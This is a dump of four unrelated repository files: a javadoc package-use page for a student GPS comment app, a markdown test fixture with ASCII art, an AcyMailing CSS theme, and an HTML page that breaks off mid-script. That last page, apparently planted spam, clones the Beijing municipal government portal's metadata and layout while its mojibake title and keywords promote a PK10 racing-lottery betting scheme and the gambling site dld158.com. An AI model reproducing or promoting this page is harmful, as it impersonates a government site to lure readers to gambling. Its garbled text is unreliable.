<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_65) on Mon Mar 17 09:50:40 MDT 2014 --> <TITLE> Uses of Package com.CMPUT301W14T13.gpscommentlogger.model.tasks </TITLE> <META NAME="date" CONTENT="2014-03-17"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package com.CMPUT301W14T13.gpscommentlogger.model.tasks"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-use.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Package<br>com.CMPUT301W14T13.gpscommentlogger.model.tasks</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-summary.html">com.CMPUT301W14T13.gpscommentlogger.model.tasks</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.CMPUT301W14T13.gpscommentlogger.controller"><B>com.CMPUT301W14T13.gpscommentlogger.controller</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>com.CMPUT301W14T13.gpscommentlogger.model.tasks</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.CMPUT301W14T13.gpscommentlogger.controller"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Classes in <A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-summary.html">com.CMPUT301W14T13.gpscommentlogger.model.tasks</A> used by <A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/controller/package-summary.html">com.CMPUT301W14T13.gpscommentlogger.controller</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/ServerTask.html#com.CMPUT301W14T13.gpscommentlogger.controller"><B>ServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/Task.html#com.CMPUT301W14T13.gpscommentlogger.controller"><B>Task</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="com.CMPUT301W14T13.gpscommentlogger.model.tasks"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Classes in <A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-summary.html">com.CMPUT301W14T13.gpscommentlogger.model.tasks</A> used by <A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-summary.html">com.CMPUT301W14T13.gpscommentlogger.model.tasks</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/ImageUpdateServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>ImageUpdateServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/InitializationServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>InitializationServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/LocalTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>LocalTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/LocationUpdateServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>LocationUpdateServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/MockTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>MockTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/MyFavouritesLocalTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>MyFavouritesLocalTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/MySavesLocalTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>MySavesLocalTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/PageMockTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>PageMockTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/PostMockTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>PostMockTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/PostNewServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>PostNewServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/SearchServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>SearchServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/ServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>ServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/Task.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>Task</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/TextUpdateServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>TextUpdateServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><B><A HREF="../../../../../com/CMPUT301W14T13/gpscommentlogger/model/tasks/class-use/UpdateServerTask.html#com.CMPUT301W14T13.gpscommentlogger.model.tasks"><B>UpdateServerTask</B></A></B> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?com/CMPUT301W14T13/gpscommentlogger/model/tasks/package-use.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
usr/share/owncloud/apps/notes/js/vendor/markdown/test/fixtures/docs-maruku-unittest/paragraph.html
yeupou/stalag13
# # FILE DISCONTINUED HERE # UPDATED VERSION AT # https://gitlab.com/yeupou/stalag13/raw/master/usr/share/owncloud/apps/notes/js/vendor/markdown/test/fixtures/docs-maruku-unittest/paragraph.html # # | | # \_V_// # \/=|=\/ # [=v=] # __\___/_____ # /..[ _____ ] # /_ [ [ M /] ] # /../.[ [ M /@] ] # <-->[_[ [M /@/] ] # /../ [.[ [ /@/ ] ] # _________________]\ /__/ [_[ [/@/ C] ] # <_________________>>0---] [=\ \@/ C / / # ___ ___ ]/000o /__\ \ C / / # \ / /....\ \_/ / # ....\||/.... [___/=\___/ # . . . . [...] [...] # . .. . [___/ \___] # . 0 .. 0 . <---> <---> # /\/\. . . ./\/\ [..] [..] # <p>Paragraph</p>
media/com_acymailing/css/component_default_fancy_green.css
thiyagarajan/newschool
@import url("component_default.css"); /***GREEN FRONT-END***/ /**inputbox**/ #acyarchivelisting .inputbox, #acyuserinfo .inputbox, #acyuserinfo .inputbox{ border:1px solid #d9e668; border-bottom:1px solid #c5d442; border-right:1px solid #c5d442; padding:3px;} #acyarchivelisting .inputbox:hover, #acyuserinfo .inputbox:hover, #acyuserinfo .inputbox:hover{ border:1px solid #c1ce55; border-bottom:1px solid #a8b632; border-right:1px solid #a8b632;} #acyarchivelisting .inputbox:focus, #acyuserinfo .inputbox:focus, #acyuserinfo .inputbox:focus{ border:1px solid #b7c634;} /**button**/ #acyarchivelisting .button, #acymodifyform .button, #unsubbutton_div .button{ border:none; background-color:#a9b53c; border-bottom:2px solid #8d972f; background-image:none; color:#FFF; padding:3px 5px 1px 5px; } #acyarchivelisting .button:hover, #acymodifyform .button:hover, #unsubbutton_div .button:hover{ background-color:#c5d442; border-bottom:2px solid #adba37; background-image:none; } /**list archive**/ #acyarchivelisting #acymailingsearch{ margin-bottom:20px;} #acyarchivelisting{ background-color:#f8f8f8; border:1px solid #CCC; padding:20px; margin-right:20px; margin-bottom:20px; } #acyarchivelisting table{ border:0px !important;} #acyarchivelisting .contentheading{ color:#fff; background-color:#c5d442; font-size:16px; border-bottom:2px solid #808c14; padding:4px 0 4px 20px; } #acyarchivelisting .contentpane form{ background-color:#fff; border:1px solid #ccc; padding:20px; } #acyarchivelisting .contentpane .contentdescription{ color:#5c650b; font-weight:bold; padding:4px 0 3px 20px; background-color:#d9e668; border-bottom:2px solid #b7c634; } #acyarchivelisting .acynewbutton a:hover, #acyarchivelisting .acynewbutton a:focus{ background-color:transparent; color:#808c14; } #acyarchivelisting .sectiontableheader{ color:#808c14; } #acyarchivelisting .contentpane thead{ border-bottom:1px solid #d9e668; height:30px; } #acyarchivelisting .contentpane tbody{ color:#808c14; } #acyarchivelisting .sectiontableheader a{ color:#808c14; text-decoration:none; background-color:transparent; font-weight:bold; font-size:12px; } #acyarchivelisting .sectiontableheader a:hover, #acyarchivelisting .sectiontableheader a:focus{ text-decoration:underline; background-color:transparent; color:#808c14; } #acyarchivelisting .sectiontableentry1, #acyarchivelisting .sectiontableentry2{ text-align:center; height:30px; border-bottom:1px solid #eee; } #acyarchivelisting .sectiontableentry1:hover, #acyarchivelisting .sectiontableentry2:hover{ background-color:#f5f5f5; } #acyarchivelisting .sectiontableentry1 a:link, #acyarchivelisting .sectiontableentry2 a:link, #acyarchivelisting .sectiontableentry1 a:visited, #acyarchivelisting .sectiontableentry2 a:visited { text-decoration:none; color:#808c14; background-color:transparent; } #acyarchivelisting .sectiontableentry1 a:hover, #acyarchivelisting .sectiontableentry2 a:hover, #acyarchivelisting .sectiontableentry1 a:active, #acyarchivelisting .sectiontableentry2 a:active { color:#808c14; background-color:transparent; text-decoration:underline; } /**lists archive**/ #acylistslisting{ background-color:#f8f8f8; border:1px solid #ccc; padding:20px; margin-right:20px; margin-bottom:20px; } #acylistslisting .componentheading{ color:#fff; background-color:#c5d442; font-size:16px; border-bottom:2px solid #808c14; padding:4px 0 4px 20px; } .acymailing_list{ background-color:#fff; } .acymailing_list .list_name{ color:#5c650b; font-weight:bold; padding:4px 0 3px 20px; background-color:#d9e668; border-bottom:2px solid #b7c634; } #acylistslisting .list_name a{ color:#5c650b; cursor:pointer; text-decoration:none; background-color:transparent; font-size:12px; font-weight:bold; } #acylistslisting .list_name a:hover, #acylistslisting .list_name a:focus { text-decoration:underline; background-color:transparent; color:#5c650b; } #acylistslisting .list_description{ color:#333; padding-left:20px; } div.acymailing_list:hover{ background-color :#e9edc6; } #acylistslisting .contentpane thead td{ padding-top:20px; } #acylistslisting div.acymailing_list{ border : 1px solid #cccccc; margin : 0px; padding : 0px; } /**your subscription**/ #acymodifyform table#acyusersubscription th{ padding:4px 0px 2px 20px; color:#5c650b; text-align:left; } #acyusersubscription .acystatus{ padding-top:20px; } #acymodifyform{ background-color:#f8f8f8; border:1px solid #CCC; padding:20px; margin-right:20px; margin-bottom:20px; } #acymodifyform .adminform{ color:#666; text-align:left; } #acymodifyform fieldset{ padding:0px; } #acyuserinfo{ background-color:#fff; border:1px solid #CCC; } #acyuserinfo select{ border:1px solid #ccc;} #acyuserinfo .key{ color:#808c14; font-weight:bold; font-size:11px; padding-left:20px; } #acyusersubscription thead{ background-color:#d9e668; border-bottom:3px solid #b7c634; padding-bottom:20px; } #acyusersubscription{ border:1px solid #CCC; } #acyusersubscription tbody{ background-color:#FFF; } #acymodifyform legend{ color:#fff; background-color:#c5d442; font-size:16px; border-bottom:2px solid #808c14; width:100%; padding: 4px 0px; } #acymodifyform legend span{ padding: 0px 20px ; } #acyuserinfo input{ margin:0 5px; } #acyusersubscription .list_name{ text-align:left; font-size:12px; font-weight:bold; margin-left:20px; color:#808c14; border-bottom:2px solid #d9e668; padding-top:20px; } #acyusersubscription .list_description{ text-align:left; font-size:12px; margin-left:10px; color:#333; } #acymodifyform .acymodifybutton{ text-align:center; } /*************************************unsubpage**/ #unsubpage{ background-color:#f8f8f8; border:1px solid #ccc; color:#666; padding:20px; margin-right:20px; margin-bottom:20px; } #unsubpage .unsubintro{ color:#5c650b; font-weight:bold; padding:2px 0 2px 20px; background-color:#d9e668; display:block; border-bottom:2px solid #b7c634; border-top:1px solid #ccc; border-right:1px solid #ccc; border-left:1px solid #ccc; } #unsubpage .unsuboptions{ background-color:#FFF; border:1px solid #CCC; padding:5px 20px 20px 20px; font-size:11px; } #unsubpage .unsubsurvey{ margin:10px 0 20px 0; background-color:#fff; padding:0px; padding-bottom:20px; border:1px solid #ccc; } #unsubpage .unsubsurvey .unsubsurveytext{ color:#5c650b; font-weight:bold; padding:2px 0 2px 20px; background-color:#d9e668; border-bottom:2px solid #b7c634; display:block; } #unsubpage .unsubsurvey div{ margin-top:5px; font-size:11px; padding-left:20px; } #unsubpage .unsubsurvey textarea{ margin-top:15px; border:1px solid #d9e668; } #unsubpage .unsubsurvey textarea:hover{ border:1px solid #c1ce55; border-bottom:1px solid #a8b632; border-right:1px solid #a8b632;} #unsubpage .input{ padding-right:10px; } #unsubbutton_div{ text-align:center; } #unsubpage input{ margin-right:10px;} /*newsletter*/ #acyarchiveview{ border:1px solid #ccc; background-color:#f8f8f8; padding:10px;} #acyarchiveview .contentheading{ font-size:16px; font-weight:bold; color:#808C14; margin-bottom:10px;}
logs/po/q265612.html
ForAEdesWeb/AEW25
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible"content="IE=9; IE=8; IE=7; IE=EDGE"> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="desCription" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®»¶Ó­´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨" /> <title>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®_±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®-dld158ÓéÀÖ{°Ù¶ÈÐÂÎÅ}°Ù¶ÈÈÏÖ¤</title> <!--ÈÈÁ¦Í¼¿ªÊ¼--> <meta name="uctk" content="enabled"> <!--ÈÈÁ¦Í¼½áÊø--> <meta name="keywords" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®"/> <meta name="desCription" content="»¶Ó­´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨"/> <meta name="sitename" content="Ê×¶¼Ö®´°-±±¾©ÊÐÕþÎñÃÅ»§ÍøÕ¾"> <meta name="siteurl" content="http://www.beijing.gov.cn"> <meta name="district" content="±±¾©" > <meta name="filetype" content="0"> <meta name="publishedtype" content="1"> <meta name="pagetype" content="2"> <meta name="subject" content="28428;1"> <!-- Le styles --> <link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap150609.css" rel="stylesheet"> <link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap-responsive150609.css" rel="stylesheet"> <style> body { background:#E8E8E8; /* 60px to make the container go all the way to the bottom of the topbar */ } .navbar .btn-navbar { position:absolute; right:0; margin-top:50px;} #othermessage p {width:50%;} #othermessage dl { width:50%;} #breadcrumbnav ul { width:100%;} #breadcrumbnav ul li { line-height:14px; font-family:"ËÎÌå"; padding:0px 10px; margin:0; background:none; } #othermessage span { padding:0px 10px;} #footer { margin:20px -20px 0px -20px;} .navbar .nav li a { font-family:"Microsoft YaHei";} #div_zhengwen { font-family:"SimSun";} #div_zhengwen p{ font-family:"SimSun"; padding:0;} select { width:75px; float:left; height:35px;} .search .input{ border:1px solid #c1c1c1; width:290px;} .bdsharebuttonbox { float:left; width:80%;} .navbar .nav li a { padding: 10px 48px 11px 49px;} .nav_weather span { float:right;} #footer { position:absolute; left:0; right:0; margin:20px 0 0 0;} #essaybottom {font-family:"simsun"; } #pic { text-align:center; } #pic ul { padding-top:10px; display:none; } #pic li {font-family:"SimSun";} .content_text h1 {line-height:150%;} .version { float:right; padding:48px 50px 0 0} .search { padding: 50px 0 0 70px;} .nav_weather a { font-family:simsun;} .version li a { font-family:simsun;} .footer-class { font-family:simsun;} @media only screen and (max-width: 480px) { #pic img { width:100%;} } @media only screen and (max-width: 320px) { #pic img { width:100%;} } @media only screen and (max-width: 640px) { #pic img { width:100%;} } #filerider .filelink {font-family:"SimSun";} #filerider .filelink a:link { color:#0000ff; font-family:"SimSun";} </style> <sCript type="text/javasCript"> var pageName = "t1424135"; var pageExt = "htm"; var pageIndex = 0 + 1; var pageCount = 1; function getCurrentPage() { document.write(pageIndex); } function generatePageList() { for (i=0;i<1;i++) { var curPage = i+1; document.write('<option value=' + curPage); if (curPage == pageIndex) document.write(' selected'); document.write('>' + curPage + '</option>'); } } function preVious(n) { if (pageIndex == 1) { alert('ÒѾ­ÊÇÊ×Ò³£¡'); } else { getPageLocation(pageIndex-1); } } function next(n) { if (pageIndex == pageCount) { alert('ÒѾ­ÊÇβҳ£¡'); } else { nextPage(pageIndex); } } function nextPage(page) { var gotoPage = ""; if (page == 0) { gotoPage = pageName + "." + pageExt; } else { gotoPage = pageName + "_" + page + "." + pageExt; } location.href = gotoPage; } function getPageLocation(page) { var gotoPage = ""; var tpage; if (page == 1) { gotoPage = pageName + "." + pageExt; } else { tpage=page-1; gotoPage = pageName + "_" + tpage + "." + pageExt; } location.href = gotoPage; } </sCript> <SCRIPT type=text/javasCript> function $(xixi) { return document.getElementById(xixi); } //ת»»×ֺŠfunction doZoom(size){ if(size==12){ $("contentText").style.fontSize = size + "px"; $("fs12").style.display = ""; $("fs14").style.display = "none"; $("fs16").style.display = "none"; } if(size==14){ $("contentText").style.fontSize = size + "px"; $("fs12").style.display = "none"; $("fs14").style.display = ""; $("fs16").style.display = "none"; } if(size==16){ $("contentText").style.fontSize = size + "px"; $("fs12").style.display = "none"; $("fs14").style.display = "none"; $("fs16").style.display = ""; } } </SCRIPT> <!-- Le HTML5 shim, for IE6-8 support of HTML5 elements --> <!--[if lt IE 9]> <sCript src="//html5shim.googlecode.com/svn/trunk/html5.js"></sCript> <![endif]--> <!-- Le fav and touch icons --> <link rel="shortcut icon" href="images/favicon.ico"> <link rel="apple-touch-icon" href="images/apple-touch-icon.png"> <link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png"> <sCript type="text/javasCript"> window.onload = function(){ var picurl = [ "", "", "", "", "", "", "", "", "", "" ]; var i=0; for(i=0;i<picurl.length;i++) { picurl[i].index=i; if(picurl[i]!="") { document.getElementById("pic_"+i).style.display = "block"; } } } </sCript> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="nav_weather"> <div class="container"><a href="http://zhengwu.beijing.gov.cn/sld/swld/swsj/t1232150.htm" title="ÊÐί" target="_blank">ÊÐί</a> | <a href="http://www.bjrd.gov.cn/" title="ÊÐÈË´ó" target="_blank">ÊÐÈË´ó</a> | <a href="http://www.beijing.gov.cn/" title="ÊÐÕþ¸®" target="_blank">ÊÐÕþ¸®</a> | <a href="http://www.bjzx.gov.cn/" title="ÊÐÕþЭ" target="_blank">ÊÐÕþЭ</a></div> </div> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <div class="span12"> <a class="brand" href="http://www.beijing.gov.cn/"><img src="http://www.beijing.gov.cn/images/zhuanti/xysym/logo.png" /></a> <div class="search"> <sCript language="JavaScript" type="text/javasCript"> function checkForm(){ var temp = searchForm.temp.value; var database = searchForm.database.value; if(temp==null 